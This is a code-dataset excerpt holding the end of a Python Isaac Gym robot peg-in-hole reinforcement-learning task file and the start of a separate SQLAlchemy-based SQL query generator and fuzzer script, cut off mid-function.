ctrl_target_gripper_dof_pos=0.0,\n do_scale=True)\n\n def post_physics_step(self):\n \"\"\"Step buffers. Refresh tensors. Compute observations and reward. Reset environments.\"\"\"\n\n self.progress_buf[:] += 1\n\n self.refresh_base_tensors()\n self.refresh_env_tensors()\n self._refresh_task_tensors()\n self.compute_observations()\n self.compute_reward()\n\n def compute_observations(self):\n \"\"\"Compute observations.\"\"\"\n\n # Shallow copies of tensors\n obs_tensors = [self.fingertip_midpoint_pos,\n self.fingertip_midpoint_quat,\n self.fingertip_midpoint_linvel,\n self.fingertip_midpoint_angvel,\n self.peg_pos,\n self.peg_quat,\n self.hole_pos,\n self.hole_quat,]\n\n self.obs_buf = torch.cat(obs_tensors, dim=-1) # shape = (num_envs, num_observations)\n\n return self.obs_buf\n\n def compute_reward(self):\n \"\"\"Update reward and reset buffers.\"\"\"\n\n self._update_reset_buf()\n self._update_rew_buf()\n\n def _update_reset_buf(self):\n \"\"\"Assign environments for reset if successful or failed.\"\"\"\n\n # If max episode length has been reached\n self.reset_buf[:] = torch.where(self.progress_buf[:] >= self.max_episode_length - 1,\n torch.ones_like(self.reset_buf),\n self.reset_buf)\n\n def _update_rew_buf(self):\n \"\"\"Compute reward at current timestep.\"\"\"\n\n keypoint_reward = -self._get_keypoint_dist()\n action_penalty = torch.norm(self.actions, p=2, dim=-1) * self.cfg_task.rl.action_penalty_scale\n\n self.rew_buf[:] = keypoint_reward * self.cfg_task.rl.keypoint_reward_scale \\\n - action_penalty * self.cfg_task.rl.action_penalty_scale\n\n # In this policy, episode length is constant across all envs\n is_last_step = (self.progress_buf[0] == self.max_episode_length - 1)\n \n if is_last_step:\n # Check if peg is close enough to hole\n is_peg_close_to_hole = self._check_peg_close_to_hole()\n self.rew_buf[:] += is_peg_close_to_hole * self.cfg_task.rl.success_bonus\n self.extras['successes'] = torch.mean(is_peg_close_to_hole.float())\n\n def reset_idx(self, env_ids):\n \"\"\"Reset specified environments.\"\"\"\n\n self._reset_franka(env_ids)\n self._reset_object(env_ids)\n\n # Close gripper onto peg\n self.disable_gravity() # to prevent peg from falling\n for _ in range(self.cfg_task.env.num_gripper_close_sim_steps):\n self.ctrl_target_dof_pos[env_ids, 7:9] = 0.0\n delta_hand_pose = torch.zeros((self.num_envs, self.cfg_task.env.numActions),\n device=self.device) # no arm motion\n self._apply_actions_as_ctrl_targets(actions=delta_hand_pose,\n ctrl_target_gripper_dof_pos=0.0,\n do_scale=False)\n self.gym.simulate(self.sim)\n self.render()\n self.enable_gravity(gravity_mag=abs(self.cfg_base.sim.gravity[2]))\n\n self._randomize_gripper_pose(env_ids, sim_steps=self.cfg_task.env.num_gripper_move_sim_steps)\n\n self._reset_buffers(env_ids)\n\n def _reset_franka(self, env_ids):\n \"\"\"Reset DOF states and DOF targets of Franka.\"\"\"\n\n self.dof_pos[env_ids] = torch.cat((torch.tensor(self.cfg_task.randomize.franka_arm_initial_dof_pos, \n device=self.device).repeat((len(env_ids), 1)),\n (self.peg_widths * 0.5) * 1.1, # buffer on gripper DOF pos to prevent initial contact\n (self.peg_widths * 0.5) * 1.1), # buffer on gripper DOF pos to prevent initial contact\n dim=-1) # shape = (num_envs, num_dofs)\n\n self.dof_vel[env_ids] = 0.0 # shape = (num_envs, num_dofs)\n self.ctrl_target_dof_pos[env_ids] = self.dof_pos[env_ids]\n\n multi_env_ids_int32 = self.franka_actor_ids_sim[env_ids].flatten()\n self.gym.set_dof_state_tensor_indexed(self.sim,\n gymtorch.unwrap_tensor(self.dof_state),\n gymtorch.unwrap_tensor(multi_env_ids_int32),\n len(multi_env_ids_int32))\n\n def _reset_object(self, env_ids):\n \"\"\"Reset root states of peg and hole.\"\"\"\n\n # shape of root_pos = (num_envs, num_actors, 3)\n # shape of root_quat = (num_envs, num_actors, 4)\n # shape of root_linvel = (num_envs, num_actors, 3)\n # shape of root_angvel = (num_envs, num_actors, 3)\n\n # Randomize root state of peg within gripper\n self.root_pos[env_ids, self.peg_actor_id_env, 0] = 0.0\n self.root_pos[env_ids, self.peg_actor_id_env, 1] = 0.0\n fingertip_midpoint_pos_reset = 0.58781 # self.fingertip_midpoint_pos at reset\n peg_base_pos_local = self.cfg_task.rl.peg_finger_com_offset + self.peg_heights.squeeze(-1)*0.5\n self.root_pos[env_ids, self.peg_actor_id_env, 2] = fingertip_midpoint_pos_reset - peg_base_pos_local\n\n peg_noise_pos_in_gripper = 2 * (torch.rand((self.num_envs, 3), dtype=torch.float32, device=self.device) - 0.5) # [-1, 1]\n peg_noise_pos_in_gripper = peg_noise_pos_in_gripper @ torch.diag(\n torch.tensor(self.cfg_task.randomize.peg_noise_pos_in_gripper, device=self.device))\n self.root_pos[env_ids, self.peg_actor_id_env, :] += peg_noise_pos_in_gripper[env_ids]\n\n \n peg_rot_euler = torch.tensor([0.0, 0.0, math.pi * 0.5], device=self.device).repeat(len(env_ids), 1)\n peg_noise_rot_in_gripper = 2 * (torch.rand(self.num_envs, dtype=torch.float32, device=self.device) - 0.5) # [-1, 1]\n peg_noise_rot_in_gripper *= self.cfg_task.randomize.peg_noise_rot_in_gripper\n peg_rot_euler[:, 2] += peg_noise_rot_in_gripper\n peg_rot_quat = torch_utils.quat_from_euler_xyz(peg_rot_euler[:, 0], peg_rot_euler[:, 1], peg_rot_euler[:, 2])\n self.root_quat[env_ids, self.peg_actor_id_env] = peg_rot_quat\n\n # Randomize root state of hole\n hole_noise_xy = 2 * (torch.rand((self.num_envs, 2), dtype=torch.float32, device=self.device) - 0.5) # [-1, 1]\n hole_noise_xy = hole_noise_xy @ torch.diag(\n torch.tensor(self.cfg_task.randomize.hole_pos_xy_noise, dtype=torch.float32, device=self.device))\n self.root_pos[env_ids, self.hole_actor_id_env, 0] = self.cfg_task.randomize.hole_pos_xy_initial[0] + \\\n hole_noise_xy[env_ids, 0]\n self.root_pos[env_ids, self.hole_actor_id_env, 1] = self.cfg_task.randomize.hole_pos_xy_initial[1] + \\\n hole_noise_xy[env_ids, 1]\n self.root_pos[env_ids, self.hole_actor_id_env, 2] = self.cfg_base.env.table_height\n self.root_quat[env_ids, self.hole_actor_id_env] = torch.tensor([0.0, 0.0, 0.0, 1.0], dtype=torch.float32,\n device=self.device).repeat(len(env_ids), 1)\n\n self.root_linvel[env_ids, self.hole_actor_id_env] = 0.0\n self.root_angvel[env_ids, self.hole_actor_id_env] = 0.0\n\n peg_hole_actor_ids_sim = torch.cat((self.peg_actor_ids_sim[env_ids],\n self.hole_actor_ids_sim[env_ids]),\n dim=0)\n self.gym.set_actor_root_state_tensor_indexed(self.sim,\n gymtorch.unwrap_tensor(self.root_state),\n gymtorch.unwrap_tensor(peg_hole_actor_ids_sim),\n len(peg_hole_actor_ids_sim))\n\n def _reset_buffers(self, env_ids):\n \"\"\"Reset buffers.\"\"\"\n\n self.reset_buf[env_ids] = 0\n self.progress_buf[env_ids] = 0\n\n def _set_viewer_params(self):\n \"\"\"Set viewer parameters.\"\"\"\n\n cam_pos = gymapi.Vec3(-1.0, -1.0, 1.0)\n cam_target = gymapi.Vec3(0.0, 0.0, 0.5)\n self.gym.viewer_camera_look_at(self.viewer, None, cam_pos, cam_target)\n\n def _apply_actions_as_ctrl_targets(self, actions, ctrl_target_gripper_dof_pos, do_scale):\n \"\"\"Apply actions from policy as position/rotation targets.\"\"\"\n\n # Interpret actions as target pos displacements and set pos target\n pos_actions = actions[:, 0:3]\n if do_scale:\n pos_actions = pos_actions @ torch.diag(torch.tensor(self.cfg_task.rl.pos_action_scale, device=self.device))\n self.ctrl_target_fingertip_midpoint_pos = self.fingertip_midpoint_pos + pos_actions\n\n # Interpret actions as target rot (axis-angle) displacements\n rot_actions = actions[:, 3:6]\n if do_scale:\n rot_actions = rot_actions @ torch.diag(torch.tensor(self.cfg_task.rl.rot_action_scale, device=self.device))\n\n # Convert to quat and set rot target\n angle = torch.norm(rot_actions, p=2, dim=-1)\n axis = rot_actions / angle.unsqueeze(-1)\n rot_actions_quat = torch_utils.quat_from_angle_axis(angle, axis)\n if self.cfg_task.rl.clamp_rot:\n rot_actions_quat = torch.where(angle.unsqueeze(-1).repeat(1, 4) > self.cfg_task.rl.clamp_rot_thresh,\n rot_actions_quat,\n torch.tensor([0.0, 0.0, 0.0, 1.0], device=self.device).repeat(self.num_envs,\n 1))\n self.ctrl_target_fingertip_midpoint_quat = torch_utils.quat_mul(rot_actions_quat, self.fingertip_midpoint_quat)\n\n if self.cfg_ctrl['do_force_ctrl']:\n # Interpret actions as target forces and target torques\n force_actions = actions[:, 6:9]\n if do_scale:\n force_actions = force_actions @ torch.diag(\n torch.tensor(self.cfg_task.rl.force_action_scale, device=self.device))\n\n torque_actions = actions[:, 9:12]\n if do_scale:\n torque_actions = torque_actions @ torch.diag(\n torch.tensor(self.cfg_task.rl.torque_action_scale, device=self.device))\n\n self.ctrl_target_fingertip_contact_wrench = torch.cat((force_actions, torque_actions), dim=-1)\n\n self.ctrl_target_gripper_dof_pos = ctrl_target_gripper_dof_pos\n\n self.generate_ctrl_signals()\n\n def _get_keypoint_offsets(self, num_keypoints):\n \"\"\"\n Get uniformly-spaced keypoints along a line of unit length, centered at 0.\n e.g. if num_keypoints = 2 :\n tensor([[ 0.0000, 0.0000, -0.5000],\n [ 0.0000, 0.0000, 0.5000]])\n\n if num_keypoints = 4 :\n tensor([[ 0.0000, 0.0000, -0.5000],\n [ 0.0000, 0.0000, -0.1667],\n [ 0.0000, 0.0000, 0.1667],\n [ 0.0000, 0.0000, 0.5000]])\n \"\"\"\n\n keypoint_offsets = torch.zeros((num_keypoints, 3), device=self.device)\n keypoint_offsets[:, -1] = torch.linspace(0.0, 1.0, num_keypoints, device=self.device) - 0.5\n\n return keypoint_offsets\n\n def _get_keypoint_dist(self):\n \"\"\"Get keypoint distance.\"\"\"\n\n keypoint_dist = torch.sum(torch.norm(self.keypoints_hole - self.keypoints_peg, p=2, dim=-1), dim=-1)\n # print(f'peg{self.keypoints_peg}dist{keypoint_dist}')\n return keypoint_dist\n\n def _check_peg_close_to_hole(self):\n \"\"\"Check if peg is close to hole.\"\"\"\n\n keypoint_dist = torch.norm(self.keypoints_hole - self.keypoints_peg, p=2, dim=-1)\n\n is_peg_close_to_hole = torch.where(torch.sum(keypoint_dist, dim=-1) < self.cfg_task.rl.close_error_thresh,\n torch.ones_like(self.progress_buf),\n torch.zeros_like(self.progress_buf))\n # Peg Hole tensors self.cfg_task.rl.peg_over_hole\n is_peg_over_hole = torch.where(self.peg_pos[ : , 2] > self.cfg_task.rl.peg_over_hole + self.cfg_base.env.table_height,\n torch.ones_like(self.progress_buf),\n torch.zeros_like(self.progress_buf))\n\n is_peg_close_to_hole=torch.where(torch.logical_and(is_peg_close_to_hole, is_peg_over_hole),\n torch.ones_like(self.progress_buf),\n torch.zeros_like(self.progress_buf)) \n return is_peg_close_to_hole\n\n def _randomize_gripper_pose(self, env_ids, sim_steps):\n \"\"\"Move gripper to random pose.\"\"\"\n\n # Set target pos above table\n self.ctrl_target_fingertip_midpoint_pos = torch.tensor([0.0, 0.0, self.cfg_base.env.table_height], device=self.device)+\\\n torch.tensor(self.cfg_task.randomize.fingertip_midpoint_pos_initial, device=self.device)\n self.ctrl_target_fingertip_midpoint_pos = self.ctrl_target_fingertip_midpoint_pos.unsqueeze(0).repeat(self.num_envs, 1)\n\n fingertip_midpoint_pos_noise = \\\n 2 * (torch.rand((self.num_envs, 3), dtype=torch.float32, device=self.device) - 0.5) # [-1, 1]\n fingertip_midpoint_pos_noise = \\\n fingertip_midpoint_pos_noise @ torch.diag(torch.tensor(self.cfg_task.randomize.fingertip_midpoint_pos_noise,\n device=self.device))\n self.ctrl_target_fingertip_midpoint_pos += fingertip_midpoint_pos_noise\n\n # Set target rot\n ctrl_target_fingertip_midpoint_euler = torch.tensor(self.cfg_task.randomize.fingertip_midpoint_rot_initial,\n device=self.device).unsqueeze(0).repeat(self.num_envs, 1)\n\n fingertip_midpoint_rot_noise = \\\n 2 * (torch.rand((self.num_envs, 3), dtype=torch.float32, device=self.device) - 0.5) # [-1, 1]\n fingertip_midpoint_rot_noise = fingertip_midpoint_rot_noise @ torch.diag(\n torch.tensor(self.cfg_task.randomize.fingertip_midpoint_rot_noise, device=self.device))\n ctrl_target_fingertip_midpoint_euler += fingertip_midpoint_rot_noise\n self.ctrl_target_fingertip_midpoint_quat = torch_utils.quat_from_euler_xyz(\n ctrl_target_fingertip_midpoint_euler[:, 0],\n ctrl_target_fingertip_midpoint_euler[:, 1],\n ctrl_target_fingertip_midpoint_euler[:, 2])\n\n # Step sim and render\n for _ in range(sim_steps):\n self.refresh_base_tensors()\n self.refresh_env_tensors()\n self._refresh_task_tensors()\n\n pos_error, axis_angle_error = fc.get_pose_error(\n fingertip_midpoint_pos=self.fingertip_midpoint_pos,\n fingertip_midpoint_quat=self.fingertip_midpoint_quat,\n ctrl_target_fingertip_midpoint_pos=self.ctrl_target_fingertip_midpoint_pos,\n ctrl_target_fingertip_midpoint_quat=self.ctrl_target_fingertip_midpoint_quat,\n jacobian_type=self.cfg_ctrl['jacobian_type'],\n rot_error_type='axis_angle')\n\n delta_hand_pose = torch.cat((pos_error, axis_angle_error), dim=-1)\n actions = torch.zeros((self.num_envs, self.cfg_task.env.numActions), device=self.device)\n actions[:, :6] = delta_hand_pose\n\n self._apply_actions_as_ctrl_targets(actions=actions,\n ctrl_target_gripper_dof_pos=0.0,\n do_scale=False)\n\n self.gym.simulate(self.sim)\n self.render()\n\n self.dof_vel[env_ids, :] = torch.zeros_like(self.dof_vel[env_ids])\n\n # Set DOF state\n multi_env_ids_int32 = self.franka_actor_ids_sim[env_ids].flatten()\n self.gym.set_dof_state_tensor_indexed(self.sim,\n gymtorch.unwrap_tensor(self.dof_state),\n gymtorch.unwrap_tensor(multi_env_ids_int32),\n len(multi_env_ids_int32))\n","repo_name":"wangjunyi9999/assembly_tasks","sub_path":"Peg-in-Hole/peg_in_hole/tasks/factory_task_peg_hole_place.py","file_name":"factory_task_peg_hole_place.py","file_ext":"py","file_size_in_byte":21295,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"70696360082","text":"#!/usr/bin/env python3\nimport os\nimport sys\nimport signal\nimport random\nimport shutil\nimport argparse\nimport subprocess\nimport json\nfrom statistics import mean\nimport traceback\nimport sys\nimport conf\nfrom loader import *\nfrom model import *\nfrom mutator_conf import *\nfrom common import *\nfrom PrincipledMutation import *\n\nfrom sqlalchemy import create_engine, Table, Column, \\\n String, DateTime, MetaData, ForeignKey\nfrom sqlalchemy import select, join, alias, true, false\nfrom sqlalchemy.schema import CreateTable\nfrom sqlalchemy.engine.default import DefaultDialect\nfrom sqlalchemy.sql.sqltypes import *\nfrom sqlalchemy.dialects import postgresql # mysql, sqlite,\nfrom sqlalchemy.orm import load_only\nfrom sqlalchemy import or_\nfrom sqlalchemy import not_\nfrom sqlalchemy import inspect\n\n\"\"\"\n./mutator.py -s select\n./mutator.py -s sequence\nHOW TO RUN IT WITH EXISTING DATABASES:\n./mutator.py --db_info=db_conf.json --output=demo.sql -s seq\n\"\"\"\n\n# TODO:\n\"\"\"\n1. array\n - mytable = Table(\"mytable\", metadata, Column(\"data\", ARRAY(Integer)))\n2. enum\n - import enum\n - class MyEnum(enum.Enum):\n one = 1 two = 2 three = 3\n - t = Table('data', MetaData(), Column('value', Enum(MyEnum)))\n3. Sequence\n\"\"\"\n\n# reference: https://www.manuelrigger.at/pqs/\n\n\ndef exit_gracefully(original_sigint):\n def _exit_gracefully(signum, frame):\n signal.signal(signal.SIGINT, original_sigint)\n try:\n if input(\"\\nReally quit? (y/n)> \").lower().startswith('y'):\n sys.exit(1)\n except KeyboardInterrupt:\n print(\"Ok ok, quitting\")\n sys.exit(1)\n signal.signal(signal.SIGINT, _exit_gracefully)\n\n return _exit_gracefully\n\n\ndef mkdirs(pn):\n try:\n os.makedirs(pn)\n except OSError:\n pass\n\n\ndef rmdirs(pn):\n try:\n shutil.rmtree(pn)\n except OSError:\n pass\n\n\ndef run_query_pg(query):\n\n with open(TMP_QUERY, 'w') as f:\n f.write(query)\n\n cmd = \"timeout 5s psql -t -F ',' --no-align -f %s\" % TMP_QUERY\n print(subprocess.getoutput(cmd))\n\n\ndef run_query_my(query):\n\n with open(TMP_QUERY, 'w') as f:\n f.write(query)\n\n cmd = \"timeout 5s mysql -N --skip-column-names -u mysql -pmysql < %s\" \\\n % TMP_QUERY\n subprocess.getoutput(cmd)\n\n\ndef run_set_operation(query1, query2):\n chosen_operation = random.choice(SET_OPERATION)\n if chosen_operation == \"intersect\":\n print(\"try intersect\")\n return query1.intersect(query2)\n elif chosen_operation == \"intersect_all\":\n print(\"try intersect all\")\n return query1.intersect_all(query2)\n elif chosen_operation == \"union\":\n print(\"try union\")\n return query1.union(query2)\n elif chosen_operation == \"union_all\":\n print(\"try union all\")\n return query1.union_all(query2)\n elif chosen_operation == \"except_\":\n print(\"try except_\")\n return query1.except_(query2)\n elif chosen_operation == \"except_all\":\n print(\"try except_all\")\n return query1.except_all(query2)\n else:\n raise ValueError('a strange operation without sqlalchemy operation')\n\n\n# This class is for each table\n\n\nclass TableSpec(object):\n def __init__(self, name):\n self.table_name = name\n self.columns = []\n self.row_data = []\n self.pk_idx = None\n self.fk_idx = -1\n self.num_tuples = -1\n\n def add_column(self, column_name, column_type):\n self.columns.append((column_name, column_type))\n\n\n# This statistics class is built for each table\nclass TableStat(object):\n # maintain statistics for each table\n\n def __init__(self, tablename):\n self.tablename = tablename\n self.columns = []\n self.column_name = []\n self.column_type = []\n\n # min, max, average\n self.columns_stat = []\n self.table_size = 0\n\n # sqlalchemy table\n # self.sqlalchemy_tbl = None\n\n \"\"\"\n def add_sqlalchemy_tbl(self, tbl):\n self.sqlalchemy_tbl = tbl\n \"\"\"\n\n def add_column(self, column_name, column_type):\n self.column_name.append(column_name)\n self.column_type.append(column_type)\n self.columns.append([])\n\n # get row-wise data and transform to column-wise data\n def add_data(self, data):\n for x in range(len(data)):\n self.columns[x].append(data[x])\n self.table_size += 1\n\n # ret stat data by columnname\n def ret_stat(self, columnname):\n for x in range(len(self.column_name)):\n if self.column_name[x] == columnname:\n return self.columns_stat[x]\n else:\n AssertionError(\"No matching column name, my mistake\")\n\n # ret string data by columnname\n def ret_string(self, columnname):\n for x in range(len(self.column_name)):\n if self.column_name[x] == columnname:\n return self.columns[x]\n else:\n AssertionError(\"No matching column name, my mistake\")\n\n @staticmethod\n def ret_table_with_tblname(sqlalchemy_tbllist, tblname):\n for idx in range(len(sqlalchemy_tbllist)):\n name = sqlalchemy_tbllist[idx].name\n # print(name)\n if tblname == name:\n return sqlalchemy_tbllist[idx]\n return None\n\n @staticmethod\n def ret_tablestat_with_tblname(tbl_stat_list, tblname):\n for idx in range(len(tbl_stat_list)):\n name = tbl_stat_list[idx].tablename\n if tblname == name:\n return tbl_stat_list[idx]\n return None\n\n # when insertion is done, we calculate the stat\n\n def calculate_stat(self):\n\n # debug\n # print(self.columns)\n\n for x in range(len(self.columns)):\n\n # 1) if string/text ==> store length\n if self.column_type[x] == \"String\":\n temp_arr = []\n for y in range(len(self.columns[x])):\n temp_arr.append(len(self.columns[x][y]))\n\n _min, _max, _avg = self.stat_from_arr(temp_arr)\n\n # 2) if DateTime\n elif self.column_type[x] == \"DateTime\":\n temp_arr = []\n for y in range(len(self.columns[x])):\n # print(\"sampled datatime\", y)\n temp_arr.append(int(self.columns[x][y].strftime(\"%Y%m%d %H:%M:%S\")))\n # temp_arr.append(int(self.columns[x][y]))\n\n\n _min, _max, _avg = self.stat_from_arr(temp_arr)\n\n # 3) if numetic\n else:\n _min, _max, _avg = self.stat_from_arr(self.columns[x])\n\n self.columns_stat.append([_min, _max, _avg])\n\n def calculate_stat_existing_db(self, column_data, x):\n # call once for each column, different from previous method calculate_stat and populate data\n # debug\n # 1) if string/text\n if self.column_type[x] == \"String\" or isinstance((column_data[0]), str):\n temp_arr = []\n for y in range(len(column_data)):\n if column_data[y]:\n temp_arr.append(len(column_data[y]))\n else:\n temp_arr.append(0)\n _min, _max, _avg = self.stat_from_arr(temp_arr)\n self.columns_stat.append([_min, _max, _avg])\n self.columns[x].extend(column_data)\n # 2) if DateTime\n elif isinstance((column_data[0]), datetime.date):\n temp_arr = []\n for y in range(len(column_data)):\n temp_arr.append(int(column_data[y].strftime(\"%Y%m%d\")))\n # print(\"sampled datatime\", column_data[y])\n # temp_arr.append(int(column_data[y]))\n _min, _max, _avg = self.stat_from_arr(temp_arr)\n self.columns_stat.append([_min, _max, _avg])\n self.columns[x].extend(column_data)\n # 3) if numeric\n elif isinstance(column_data[0], (float, int)):\n _min, _max, _avg = self.stat_from_arr(column_data)\n self.columns_stat.append([_min, _max, _avg])\n self.columns[x].extend(column_data)\n\n # print(\"finish run update for this column\")\n\n def stat_from_arr(self, array):\n _min = min(array)\n _max = max(array)\n _avg = mean(array)\n return _min, _max, _avg\n\ndef load_existing_dbschema(config_data):\n # return 4 datafield in createsequences class\n table_specs = [] # tables spec (Tableclass), name,\n table_stats = [] # tables_stat # tables statistics (TableStat class)\n sqlalchemy_tables = []\n \n # TODO: Update connstring to not use hardcoded values\n db_name = config_data[\"name\"]\n conn_str = \"postgresql://postgres:postgres@localhost:5438/{}\".format(db_name)\n \n postgres_engine = create_engine(conn_str)\n schemameta = MetaData(postgres_engine)\n DBSession = sessionmaker(bind=postgres_engine)\n session = DBSession()\n \n table_names = (config_data[\"tables\"])\n for table_name in table_names:\n sqlalchemy_table = Table(table_name,\n schemameta,\n autoload=True,\n autoload_with=postgres_engine)\n sqlalchemy_tables.append(sqlalchemy_table)\n \n table_stat = TableStat(table_name)\n table_spec = TableSpec(table_name)\n \n table_spec.pk_idx = -1\n table_spec.fk_idx = -1\n results = session.query(sqlalchemy_table)\n table_stat.table_size = len(results.all())\n sample_results = (results[:5])\n \n for c in sqlalchemy_table.columns:\n column_data = [i[c] for i in sample_results]\n # need to use sqlalchemy type instead of real database's type\n table_spec.add_column(c.name, (c.type))\n typename = ret_typename_from_class(c.type)\n table_stat.add_column(c.name, typename)\n\n table_specs.append(table_spec)\n table_stats.append(table_stat)\n \n for c in range(len(sqlalchemy_table.columns)):\n column_data = [i[c] for i in sample_results]\n table_stat.calculate_stat_existing_db(\n column_data, c)\n\n # the tpch does not have any pk or fk\n return table_specs, table_stats, sqlalchemy_tables, sqlalchemy_tables\n\n# TODO: apply Table class when generate spec\n\n\nclass CreateSequences(object):\n \"\"\" Create queries for Create Table, Update, Insert, and Select \"\"\"\n def __init__(self,\n max_table=1,\n max_column=3,\n max_tuple=5,\n db_name=\"sqlalchemy\"):\n # initial data\n self.metadata = MetaData()\n self.max_column = max_column # max number of columns per table\n self.max_table = max_table\n self.max_tuple = max_tuple\n\n # output also required for existing database\n self.tables = [] # tables spec (TableSpec class)\n self.tables_stat = [] # tables statistics (TableStat class)\n self.sqlalchemy_tables = [] # sqlalchemy tables\n self.alc_tables = [] # sqlalchemy tables\n # output required for starting from scratch\n self.create_insert = '' # store \"create table\", \"insert\", \"index\"\n self.update = ''\n self.delete = ''\n\n # directory\n self.TMP_DIR = \"%s\" % (FUZZ_MAIN)\n self.TMP_QUERY_PN = os.path.join(FUZZ_MAIN, \"sqlsmith_query\")\n self.TMP_ERR_PN = os.path.join(FUZZ_MAIN, \"sqlsmith_err\")\n\n # sqlite engine\n # self.sqlite_engine = create_engine('sqlite:///:memory:', echo=False)\n rmdirs(FUZZ_MAIN)\n try:\n os.remove(\"%s\" % (DB_FILE))\n except Exception:\n pass\n mkdirs(FUZZ_MAIN)\n\n self.sqlite_engine = create_engine('sqlite:///%s' % (DB_FILE),\n echo=False)\n self.mysql_engine = create_engine(\n 'mysql://mysql:mysql@localhost/sqlalchemy')\n self.postgres_engine = create_engine('postgresql:///' + db_name)\n\n def update_from_existing_db(self, tables, tables_stat, sqlalchemy_tables,\n alc_tables):\n self.tables = tables\n self.tables_stat = tables_stat\n self.sqlalchemy_tables = sqlalchemy_tables\n self.alc_tables = alc_tables\n print(\"Finish loading schema info for \", len(self.sqlalchemy_tables),\n \" tables\")\n\n def create_tables(self):\n \"\"\"\n 1) need to decide the number of columns for each table\n 2) for each table, decide which column is primary key\n 3) - for each table (not all), decide which column is foreign key\n - also decide which column (w/ primary key) is referenced\n \"\"\"\n \"\"\"\n TODO:\n 1) CREATE TABLE t0(c0 INT UNIQUE COLLATE NOCASE);\n 2) Add two or more primary keys\n 3) support \"Nullable\" option:\n - e.g Column('user_id', Integer, ForeignKey(\"user.id\"),\n nullable=False)\n - we also should support use null data\n \"\"\"\n\n # Spec: num_column, types, PK, FK(optional)\n # - as a start, second to last tables always have FK\n table_spec = []\n tables = []\n\n for x in range(self.max_table):\n # 1) num_columns\n # 2) decide PK\n num_column = randoms.random_int_range(\n self.max_column) + 1 # at least two\n pk_column = randoms.random_int_range(num_column) - 1 # index\n fk_column = -1\n\n # 3) FK\n # if this is second or later table (e.g., 3rd table)\n if x > 0:\n fk_column = self.ret_fk(num_column, pk_column)\n table_spec.append((num_column, pk_column, fk_column))\n\n # 4) generate table creation queries\n prev_columns = None\n prev_table_name = ''\n for x in range(self.max_table):\n table_name = \"TABLE%d\" % x\n\n # generate new table\n temp_table = Table(table_name, self.metadata)\n columns = self.ret_columns(table_spec, x)\n\n # generate table-stat\n table_stat = TableStat(table_name)\n\n # create class for spec\n table_class = TableSpec(table_name)\n table_class.pk_idx = table_spec[x][1]\n table_class.fk_idx = table_spec[x][2]\n\n for y in range(len(columns)):\n column_name, column_type = columns[y]\n # print (column_name, column_type)\n\n # if not PK: then check FK and no-key\n if table_spec[x][1] != y:\n # TODO: add nullable option\n # e.g., Column('email_address', String (30),\n # nullable=False)\n\n # if FK\n if table_spec[x][2] == y:\n # FK_name = prev_PK_name\n FK_name = prev_columns[table_spec[x - 1][1]][0]\n prev_table_pk_idx = self.tables[-1].pk_idx\n\n # get type\n column_type = self.tables[-1].\\\n columns[prev_table_pk_idx][1]\n cur_column = Column(\n column_name, column_type,\n ForeignKey(prev_table_name + \".\" + FK_name))\n # if not FK\n else:\n cur_column = Column(column_name, column_type)\n\n # if PK: then add primary condition to column\n else:\n # prev_PK_name = column_name\n cur_column = Column(column_name,\n column_type,\n primary_key=True)\n\n # add column to table and table-stat\n temp_table.append_column(cur_column)\n table_class.add_column(column_name, column_type)\n typename = self.ret_typename_from_class(column_type)\n table_stat.add_column(column_name, typename)\n\n # store table data\n prev_columns = columns\n prev_table_name = table_name\n tables.append(temp_table)\n # table_stat.add_sqlalchemy_tbl(temp_table)\n\n # 4-1) store created table's spec\n self.tables.append(table_class)\n self.tables_stat.append(table_stat)\n\n # 5) dump table into SQL\n for table in tables:\n table.create(self.sqlite_engine, checkfirst=True)\n ct_data = CreateTable(table).compile(self.sqlite_engine,\n dialect=postgresql.dialect())\n print(ct_data)\n # print out created table to the console\n\n self.create_insert += str(ct_data).strip() + \";\\n\\n\"\n self.alc_tables.append(table)\n\n self.sqlalchemy_tables = tables\n\n def choose_join_tables(self):\n \"\"\"\n finds proper tables and column for making join\n\n input: none\n return: tbl1, tbl2, tbl1_col, tbl2_col\n \"\"\"\n\n tbl_index = randoms.random_int_range(len(self.tables) - 1)\n tbl1 = self.alc_tables[tbl_index - 1]\n tbl2 = self.alc_tables[tbl_index]\n\n tbl1_referenced_idx = self.tables[tbl_index - 1].pk_idx\n tbl2_foreignkey_idx = self.tables[tbl_index].fk_idx\n cname1 = self.tables_stat[tbl_index - 1].\\\n column_name[tbl1_referenced_idx]\n cname2 = self.tables_stat[tbl_index].column_name[tbl2_foreignkey_idx]\n\n # print (tbl_index-1)\n # print(cname1)\n # print(cname2)\n col1 = getattr(self.alc_tables[tbl_index - 1].c, cname1)\n col2 = getattr(self.alc_tables[tbl_index].c, cname2)\n\n return tbl1, tbl2, col1, col2, tbl_index - 1\n\n def ret_types_from_table(self, tbl):\n tbl_idx = self.alc_tables.index(tbl)\n tbl_types = self.tables_stat[tbl_idx].column_type\n return tbl_types\n\n def choose_same_type_columns(self, tbl1, tbl2):\n \"\"\"\n given sqlalchemy_table, we will return two columns with same type\n\n input:\n return: tbl1_sametype_col, tbl2_sametype_col, typename\n \"\"\"\n # 1) enumerate types for each table\n tbl1_types = self.ret_types_from_table(tbl1)\n tbl2_types = self.ret_types_from_table(tbl2)\n\n # 2) find common types\n common = (set(tbl1_types).intersection(tbl2_types))\n\n if len(common) < 1:\n return None, None, None, None\n\n # 3) randomly choose table\n chosen_type = random.choice(list(common))\n col1 = self.choose_columns_sqlalchemy_type(tbl1, chosen_type)\n col2 = self.choose_columns_sqlalchemy_type(tbl2, chosen_type)\n # print(\"!\")\n\n return col1, col2, chosen_type\n\n def insert_tuples(self):\n \"\"\" Insert data from first to last table\n 1) read tables spec:\n - table_name, column_name, column_type, constraints\n 2) generate input\n \"\"\"\n \"\"\" test\n print (self.tables[0])\n print (self.tables[0].columns)\n print (self.tables[0].pk_idx)\n print (self.tables[0].fk_idx)\n \"\"\"\n\n # table iterator\n for x in range(len(self.tables)):\n # tuple iterator\n current_alc_table = self.alc_tables[x]\n\n prev_primary_idx = 0\n\n # tuple insert\n num_of_tuples = randoms.random_int_range(self.max_tuple)\n for y in range(num_of_tuples):\n # colume iterator\n row_data = []\n insert_dict = {}\n\n # TODO: consider primary key (do not allow unique values)\n for z in range(len(self.tables[x].columns)):\n\n # read type name (VARCHAR special case, it is not a class)\n if type(self.tables[x].columns[z][1]) == String:\n typename = \"String\"\n else:\n typename = self.tables[x].columns[z][1].__name__\n gendata = self.get_rand_data(typename)\n\n # generate data\n if x < 1 or z != self.tables[x].fk_idx:\n row_data.append(gendata)\n elif 